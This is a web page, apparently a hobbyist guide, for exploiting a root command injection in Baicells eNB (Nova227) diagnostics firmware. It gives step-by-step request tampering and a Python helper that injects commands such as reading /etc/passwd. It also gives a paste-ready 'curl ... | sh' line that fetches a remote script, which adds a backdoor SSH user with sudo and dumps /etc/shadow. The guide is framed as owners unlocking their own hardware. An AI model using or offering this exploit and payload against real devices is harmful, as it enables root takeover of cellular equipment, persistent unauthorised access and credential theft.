Instructions

This is known to work on at least Nova227s running firmware 3.7.11.3.
It does not currently work on BaiBS_RTS_3.6.6. This will be remedied ASAP.

This and many similar weaknesses are common, and to be expected, across all Baicells products.

The diagnostics web page has a command injection that executes as root. The only
protection Baicells applied is client-side JavaScript filtering, which is bypassed simply
by editing the request before it is sent. This is great for us, as it lets us own our hardware more fully.

Log in to the web interface.
Go to the diagnostics page for ping.
Open the network tab in your browser's developer tools.
Run a ping command (set number to 1 and timeout to 1 if you like, or ping a responsive host like 127.0.0.1).
In the network tab, pick the first request for `run_commands.sh`.
Right-click it, then choose edit and re-send.
Find the section in the payload where it says `%2Ftmp%2Fdiagnose%0A&hash`.
%0A is a URL-encoded newline, so whatever follows it runs as a fresh shell line. Between the `%0A` and the `&` paste anything you
want. It does not need to be URL-encoded, but avoid bare `&`, `%` and `+` characters: the body is
form-encoded, so those would be parsed as form syntax instead of reaching the shell (percent-encode them if you need them).
Whatever you paste will be executed as root by the eNB, so be very careful. The system is BusyBox-based and very minimal, so you
don't get a full netcat or bash, for example. I don't know how it handles
quoting, so I decided to have it curl down a script which could then do whatever I needed.
`python -m http.server` makes serving such a script very easy.
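To make the edit-and-resend step repeatable, here is an added Python helper. It is my example for this write-up, not the author's script and not Baicells code. The only string taken from the page is the `%2Ftmp%2Fdiagnose%0A&hash` marker; the `cmd` field name, the sample request body and the hash value are constructed for illustration, so check your own captured request for the real parameter names.

```python
"""Splice a command into a captured run_commands.sh request body.

Added example for this write-up; not the author's script and not Baicells code.
The only string taken from the page is the marker `%2Ftmp%2Fdiagnose%0A&hash`.
Everything else (the `cmd` field name, the sample body, the hash value) is constructed.
"""
from urllib.parse import parse_qs, quote

# Marker as described on the page: the diagnose invocation ends with a URL-encoded
# newline (%0A) immediately before the &hash field.
MARKER = "%2Ftmp%2Fdiagnose%0A"
TRAILER = "&hash"


def inject_command(body: str, command: str, encode: bool = True) -> str:
    """Return `body` with `command` inserted between the marker's %0A and &hash.

    With encode=True the command is percent-encoded so that bytes which are
    significant in a form-encoded body ('&', '%', '+') reach the shell intact
    once the server decodes the form. A trailing %0A terminates the injected
    line so the shell runs it as a complete command.
    """
    idx = body.find(MARKER + TRAILER)
    if idx == -1:
        raise ValueError("marker not found: capture the run_commands.sh request first")
    insert_at = idx + len(MARKER)
    payload = quote(command, safe="") if encode else command
    return body[:insert_at] + payload + "%0A" + body[insert_at:]


def shell_lines(body: str, field: str) -> list:
    """Decode the form body the way the server would and return the lines the
    shell will see in `field`, one per list entry. The field name is an
    assumption; read it from the captured request."""
    value = parse_qs(body, keep_blank_values=True)[field][0]
    return value.splitlines()


# Constructed sample: a legitimate ping request as the diagnostics page might send it.
# The `cmd` field name and the hash value are made up for this example.
SAMPLE_BODY = "cmd=ping+-c+1+-W+1+127.0.0.1+%3E+%2Ftmp%2Fdiagnose%0A&hash=0123456789abcdef"


if __name__ == "__main__":
    modified = inject_command(SAMPLE_BODY, "id; cat /etc/passwd")
    print(modified)
    for line in shell_lines(modified, "cmd"):
        print("shell sees:", line)
```

Paste the returned body into the editor's request body field and re-send it. `shell_lines` is there so you can confirm, before sending, that the decoded second line is exactly the command you intended and that nothing in it was swallowed by the form parser.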

For your more immediate convenience, you may paste the following (triple click to select the whole string):

curl -k https://baicellsroot.xcl.is/mike.sh | sh%0A

This requires your eNB to have unfettered outbound internet access and working DNS.

This will create a new user 'mike' with the same password as your admin
account and allow you to log in via SSH on port 27149 like so:

ssh mike@baicellenb -p 27149

Obviously replace 'baicellenb' with the hostname or IP of your actual eNB.
You can then `sudo -s` for root, or whatever invocation you prefer.

You need the `-k` argument to curl to disable TLS certificate verification, because CA certificates are not set up on the Baicells firmware.
I could also offer HTTP service, but it would take me entire minutes to enable that on my servers.

You should see the output. The script runs `id` and then cats /etc/passwd and /etc/shadow.
mike.sh will exit before making any changes if there is already a 'mike' user.

Disclaimer: Tested on two of my eNBs. You are expected to know what you are doing.
Test before executing, don't blame me if it breaks. If it does break, let me know and I'll try to help.
If you don't know who I am already, how did you get here? See the links below.

https://xcl.is
https://discord.gg/c55z8aGShr
https://github.com/AmateurCellular/docs